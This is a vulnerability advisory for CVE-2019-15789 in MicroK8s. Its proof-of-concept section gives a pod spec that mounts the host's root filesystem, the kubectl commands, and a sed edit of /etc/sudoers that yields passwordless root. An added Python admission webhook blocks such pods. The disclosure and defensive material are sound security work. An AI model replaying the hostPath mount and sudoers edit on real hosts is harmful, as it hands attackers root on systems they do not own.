Privilege escalation vulnerability in MicroK8s allows a low privilege user with local access to obtain root access to the host by provisioning a privileged container. Fixed in MicroK8s 1.15.3.


MICROK8S – PRIVILEGE ESCALATION (CVE-2019-15789)

Sep 10 2019

MicroK8s prior to v1.15.3 included a privilege escalation vulnerability, allowing a low privilege user to obtain root access to the host. MicroK8s allowed any user with access to the host to deploy a pod to the underlying Kubernetes installation. This allowed an attacker with local access to provision a privileged container and gain root access to the underlying host.

Date Released: 10/09/2019
Author: Denis Andzakovic
Project Website: https://microk8s.io/
Affected Software: MicroK8s <= v1.15.2
CVE: CVE-2019-15789

PROOF-OF-CONCEPT EXPLOIT

Because low privileged users were allowed to configure the running cluster and the containers within it, a malicious user could spawn a pod with the host's root file system mounted, edit /etc/sudoers through that mount and escalate to root. The sed edit shown below only removes the password prompt for accounts that already hold sudo rights; an account outside the sudo group could just as easily append its own NOPASSWD entry through the same mount.

doi@microk8:~$ cat pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: hostmount
spec:
  containers:
  - name: shell
    image: ubuntu:latest
    command:
      - "bin/bash"
      - "-c"
      - "sleep 10000"
    volumeMounts:
      - name: root
        mountPath: /opt/root
  volumes:
  - name: root
    hostPath:
      path: /
      type: Directory
doi@microk8:~$ microk8s.kubectl apply -f pod.yaml
pod/hostmount created
doi@microk8:~$ microk8s.kubectl exec -it hostmount /bin/bash
root@hostmount:/# cd /opt/
root@hostmount:/opt# cd root/
root@hostmount:/opt/root# ls
bin   dev  home        initrd.img.old  lib64       media  opt   root  sbin  srv       sys  usr  vmlinuz
boot  etc  initrd.img  lib             lost+found  mnt    proc  run   snap  swap.img  tmp  var  vmlinuz.old
root@hostmount:/opt/root# cd etc/
root@hostmount:/opt/root/etc# sed -i 's/ALL$/NOPASSWD: ALL/g' sudoers
root@hostmount:/opt/root/etc# cat sudoers
{...snip...}
# User privilege specification
root    ALL=(ALL:ALL) NOPASSWD: ALL

# Members of the admin group may gain root privileges
%admin ALL=(ALL) NOPASSWD: ALL

# Allow members of group sudo to execute any command
%sudo   ALL=(ALL:ALL) NOPASSWD: ALL
{...snip...}
root@hostmount:/opt/root/etc# exit
exit
doi@microk8:~$ sudo su -
root@microk8:~# id
uid=0(root) gid=0(root) groups=0(root)

The same result could be achieved trivially with a privileged container. MicroK8s disables privileged containers by default, but note that installing Istio enables them.
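The fix below is about who may talk to the API server at all; the cluster-side control for the two vectors above (a hostPath mount of the host root and a privileged container) is an admission check. The following is an added example for this page, not code from the advisory, Pulse Security or the MicroK8s project: the validation logic a small validating admission webhook would run on each Pod, fed an AdmissionReview constructed from the advisory's pod.yaml. The names DENIED_HOST_PATHS, review_pod, admission_response and handle are hypothetical, as is the list of denied host directories.

```python
"""Validating admission check for the two host-takeover vectors in this advisory:
a hostPath volume that exposes the host filesystem and a privileged container.
Added example for this page; not code from the advisory, Pulse Security or the
MicroK8s project. The AdmissionReview payload is constructed from the advisory's
pod.yaml; DENIED_HOST_PATHS, review_pod, admission_response and handle are
hypothetical names."""
import json
import posixpath

# Host directories an ordinary workload must never mount. "/" is the advisory's
# vector; the others hand over equivalent control (sudoers, root's home, kubelet
# state, the snap tree). This list is an assumption for the example.
DENIED_HOST_PATHS = ("/etc", "/root", "/var/lib/kubelet", "/var/snap")


def _normalise(path):
    # Collapse "..", "." and duplicate slashes so "/etc/../" is seen as "/".
    # posixpath.normpath keeps a leading "//", hence the lstrip.
    return "/" + posixpath.normpath(path).lstrip("/")


def host_path_denied(path):
    norm = _normalise(path)
    if norm == "/":
        return True
    return any(norm == p or norm.startswith(p + "/") for p in DENIED_HOST_PATHS)


def review_pod(pod):
    """Return the list of violations for a Pod object (dict); empty means allowed."""
    spec = pod.get("spec", {})
    violations = []
    for vol in spec.get("volumes", []):
        hp = vol.get("hostPath")
        if hp and host_path_denied(hp.get("path", "/")):
            violations.append(f"volume {vol.get('name')!r} mounts host path {hp.get('path', '/')!r}")
    for c in spec.get("initContainers", []) + spec.get("containers", []):
        if c.get("securityContext", {}).get("privileged"):
            violations.append(f"container {c.get('name')!r} is privileged")
    return violations


def admission_response(review):
    """Build the AdmissionReview reply for a parsed AdmissionReview request (dict)."""
    req = review["request"]
    violations = []
    if req.get("kind", {}).get("kind") == "Pod" and req.get("operation") in ("CREATE", "UPDATE"):
        violations = review_pod(req.get("object") or {})
    resp = {"uid": req["uid"], "allowed": not violations}
    if violations:
        resp["status"] = {"code": 403, "message": "; ".join(violations)}
    return {"apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview", "response": resp}


def handle(body):
    """Wire-level entry point: JSON request body in, JSON response body out."""
    return json.dumps(admission_response(json.loads(body)))


def make_review(pod, uid="constructed-uid-1"):
    """Wrap a Pod dict in the AdmissionReview envelope the API server would send."""
    return {"apiVersion": "admission.k8s.io/v1", "kind": "AdmissionReview",
            "request": {"uid": uid, "kind": {"group": "", "version": "v1", "kind": "Pod"},
                        "operation": "CREATE", "object": pod}}


# The advisory's pod.yaml as a dict (constructed sample input).
HOSTMOUNT_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "hostmount"},
    "spec": {
        "containers": [{"name": "shell", "image": "ubuntu:latest",
                        "command": ["bin/bash", "-c", "sleep 10000"],
                        "volumeMounts": [{"name": "root", "mountPath": "/opt/root"}]}],
        "volumes": [{"name": "root", "hostPath": {"path": "/", "type": "Directory"}}],
    },
}

# The privileged variant the advisory mentions (constructed sample input).
PRIVILEGED_POD = {
    "apiVersion": "v1", "kind": "Pod", "metadata": {"name": "priv"},
    "spec": {"containers": [{"name": "shell", "image": "ubuntu:latest",
                             "securityContext": {"privileged": True}}]},
}

if __name__ == "__main__":
    for pod in (HOSTMOUNT_POD, PRIVILEGED_POD):
        print(handle(json.dumps(make_review(pod))))
```

Path matching is done on the normalised path so that `/etc/../` or `//` cannot slip past a check that only compares the literal string "/". A production webhook would also want to look at hostPID, hostNetwork and added capabilities, which the advisory does not exercise and which are left out here.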

PATCH

The MicroK8s team addressed this vulnerability in v1.15.3 by requiring that any access to the Kubernetes installation be performed by a privileged user (e.g. through sudo, or by adding the user to the microk8s group).

TIMELINE

12/06/2019 – Advisory sent to Ubuntu security mailing list.
14/06/2019 – Advisory receipt acknowledged.
16/07/2019 – Update requested.
17/07/2019 – Report confirmed by the Ubuntu team.
15/08/2019 – Update requested.
15/08/2019 – Ubuntu referenced an open pull request introducing a requirement for all MicroK8s actions to be performed via sudo.
06/09/2019 – v1.15.3 snap added to stable.
10/09/2019 – Advisory released.

CVE-2019-15789

Description
MicroK8s prior to v1.15.3 included a privilege escalation vulnerability,
allowing a low privilege user to obtain root access to the host. MicroK8s
allowed any user with access to the host to administer the underlying
Kubernetes installation, including deploy pods. This allowed an attacker
with local access to provision a privileged container and gain root access
to the underlying host.
References
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15789
https://pulsesecurity.co.nz/advisories/microk8s-privilege-escalation
https://discuss.kubernetes.io/t/explicit-use-of-sudo-in-microk8s-cli/7605
